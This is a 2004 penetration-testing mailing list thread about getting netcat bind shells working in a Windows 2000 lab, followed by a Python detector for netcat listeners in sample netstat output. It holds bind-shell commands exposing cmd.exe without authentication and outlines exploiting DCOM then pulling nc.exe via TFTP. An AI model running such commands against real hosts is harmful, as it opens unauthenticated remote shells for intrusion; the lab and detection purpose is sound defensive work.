Re: Hacking Demo and Test Lab

From: Martin Wasson (martin_wasson_at_mastercard.com)
Date: 06/15/04

    To: "Mr Harry!" <harry0@btopenworld.com>
    Date: Tue, 15 Jun 2004 11:47:11 -0500
    
    

    Harry,

    >> To use netcat in this way the command is
    >>
    >> nc -L -e cmd.exe -p 23
    >>
    >> not nc -L -p 1234 -e cmd.exe as has been suggested.

    You're joking, right? You're trying to bait me, aren't you? You don't
    REALLY want me to believe that you think that options and their arguments
    have to go in a specific order... as has been suggested, right? That would
    be like telling him that he should use "ls -al" because "ls -la" won't
    work, or that "nmap -T0 -A x.x.x.x" won't work, because it's supposed to
    be "nmap -A -T0 x.x.x.x"? Because all you did was change the order, and
    have netcat bound to a reserved port. Nice try, but I know you know better
    than that, so I'm not going to rib you about this being your first day. Heh
    heh. One might argue the use of the default telnet port, as netcat
    performs no authentication before allowing system access. Indeed, there is
    life beyond readme.txt.

    Marty Wasson, CISSP, CEH, IAM
    Sr. Information Security Analyst
    Global Information Security
    MasterCard International
    (636) 722-2372
    martin_wasson@mastercard.com

    "Men occasionally stumble over the truth, but most of them pick themselves
    up and hurry off as if nothing ever happened." Winston Churchill

    --------------------------------------------------------------------------

    CONFIDENTIALITY NOTICE
    This E-mail message and any documents which accompany it are intended only
    for the use of the individual or entity to which addressed, and may contain
    information that is privileged, confidential or exempt from disclosure
    under applicable law. If the reader is not the intended recipient, any
    disclosure, distribution or other use of this E-mail message is prohibited.
    If you have received this E-mail message in error, please notify the sender
    immediately. Thank you.
    --------------------------------------------------------------------------

    From: "Mr Harry!" <harry0@btopenworld.com>
    To: <pen-test@securityfocus.com>
    cc: (bcc: Martin Wasson/STL/MASTERCARD)
    Subject: Re: Hacking Demo and Test Lab
    Date: 06/11/2004 04:35 PM

    To use netcat in this way the command is

              nc -L -e cmd.exe -p 23

    not nc -L -p 1234 -e cmd.exe as has been suggested.

    The breakdown of it is: nc = netcat, -L = listen (you can put -d =
    stealth mode after this), -e = execute, cmd.exe = the program you want to
    execute, -p = port!

    So it's: listen for a connection and execute cmd.exe when someone
    connects on port 23!

    All you have to do is telnet <ip of box with netcat> and voilà!
    ----- Original Message -----
    From: "Martin Wasson" <martin_wasson@mastercard.com>
    To: "raza sharif" <raza@raza.demon.co.uk>
    Cc: <pen-test@securityfocus.com>
    Sent: Friday, June 11, 2004 4:33 PM
    Subject: Re: Hacking Demo and Test Lab

    >
    > Raza,
    > A few things. I wouldn't really call this advanced. Why are you hacking
    > from XP instead of Linux? Get yourself a Linux box. These exploits of
    > which you write do not spawn shells using netcat. Netcat can bind shells
    > after you install it. You have to pop the Win2k box first, with
    > something like oc192-dcom.c. This exploit will get you a shell, then have
    > it GET (tftp) the files (like netcat) from your Linux box. Once the win2k
    > box has received nc.exe, run "nc -L -p 1234 -e cmd.exe" AFTER you've
    > started netcat on your Linux box (nc <win2k IP> 1234).
    >
    > Does that help?
    >
    > Regards,
    >
    > Marty Wasson, CISSP, CEH, IAM
    > Sr. Information Security Analyst
    > Global Information Security
    > MasterCard International
    > (636) 722-2372
    > martin_wasson@mastercard.com
    >
    > "Men occasionally stumble over the truth, but most of them pick
    > themselves up and hurry off as if nothing ever happened." Winston Churchill
    >
    >
    > From: raza sharif <raza@raza.demon.co.uk>
    > To: pen-test@securityfocus.com
    > cc: (bcc: Martin Wasson/STL/MASTERCARD)
    > Subject: Hacking Demo and Test Lab
    > Date: 06/11/2004 06:41 AM
    >
    > Hi Folks,
    >
    > I'm doing some advanced Hacking Demos for management and also Corporates
    > etc.
    >
    > I have an installed Windows 2000 Server and IIS 5.0 on VMware GSX Server.
    >
    > I'm using WebDAV and other exploits that all basically should spawn a
    > shell using netcat.
    >
    > I'm using XP as my attacking machine.
    >
    > The problem at the moment is that netcat will not spawn a shell
    > regardless of what I try.
    >
    > Any ideas? I checked the install; it is Windows 2000 500.1295, no
    > reference to service packs etc. It's a default install.
    >
    > Also, what are good demos etc. to run to show real hacking on Windows
    > 2000, IIS etc. that I can get to work?
    >
    > Thanks
    >
    > Raza
    >
    > Raza@raza.demon.co.uk
    >
    > -----------------------------------------
    > CONFIDENTIALITY NOTICE
    > This e-mail message and any attachments are only for the use of the
    > intended recipient and may contain information that is privileged,
    > confidential or exempt from disclosure under applicable law. If you are
    > not the intended recipient, any disclosure, distribution or other use of
    > this e-mail message or attachments is prohibited. If you have received
    > this e-mail message in error, please delete and notify the sender
    > immediately. Thank you.

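A defender's counterpart to the listener discussed in this thread, added here as an example that is not part of any message above: it scans Windows `netstat -ano` style output for a netcat bind shell (`nc -L -e cmd.exe -p <port>`), whether it sits on the telnet port (23) or on an arbitrary port like 1234. The netstat lines, the PID-to-image mapping and the image names are constructed sample data.

```python
"""Flag listening sockets owned by shell-capable images in `netstat -ano` output."""
import re

# Constructed sample of `netstat -ano` output on a Win2k lab box (not real data).
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1040
  TCP    0.0.0.0:23             0.0.0.0:0              LISTENING       1488
  TCP    0.0.0.0:1234           0.0.0.0:0              LISTENING       1512
  TCP    192.168.56.20:1234     192.168.56.1:40122     ESTABLISHED     1512
  UDP    0.0.0.0:69             *:*                                    1296
"""

# Constructed PID -> image name mapping, as `tasklist` would report it.
PID_IMAGE = {1040: "inetinfo.exe", 1488: "nc.exe", 1512: "nc.exe", 1296: "tftpd.exe"}

# Images that should never own a listening socket on a server: a listener
# owned by netcat or cmd.exe hands out a shell with no authentication at all.
SHELL_IMAGES = {"nc.exe", "cmd.exe"}

# Ports we watch because no legitimate service is expected on them here.
WATCHED_PORTS = {23: "listener on telnet port, but no telnet service is installed"}

# Proto, local address, local port, foreign address, optional state, PID.
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+\S+\s+(LISTENING)?\s*(\d+)\s*$")


def find_suspicious_listeners(netstat_text, pid_image):
    """Return (port, pid, image, reason) for every listener worth a closer look."""
    findings = []
    for line in netstat_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(4) != "LISTENING":
            continue  # header, UDP or non-listening sockets are skipped
        port, pid = int(m.group(3)), int(m.group(5))
        image = pid_image.get(pid, "<unknown>")
        if image.lower() in SHELL_IMAGES:
            findings.append((port, pid, image, "shell-capable image owns a listening socket"))
        elif port in WATCHED_PORTS:
            findings.append((port, pid, image, WATCHED_PORTS[port]))
    return findings


if __name__ == "__main__":
    for port, pid, image, reason in find_suspicious_listeners(NETSTAT_SAMPLE, PID_IMAGE):
        print(f"port {port:<5} pid {pid:<5} {image:<12} {reason}")
```

On a real host, replace the constructed sample with the captured `netstat -ano` and `tasklist` output; the same check catches the listener regardless of which port it was started on.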

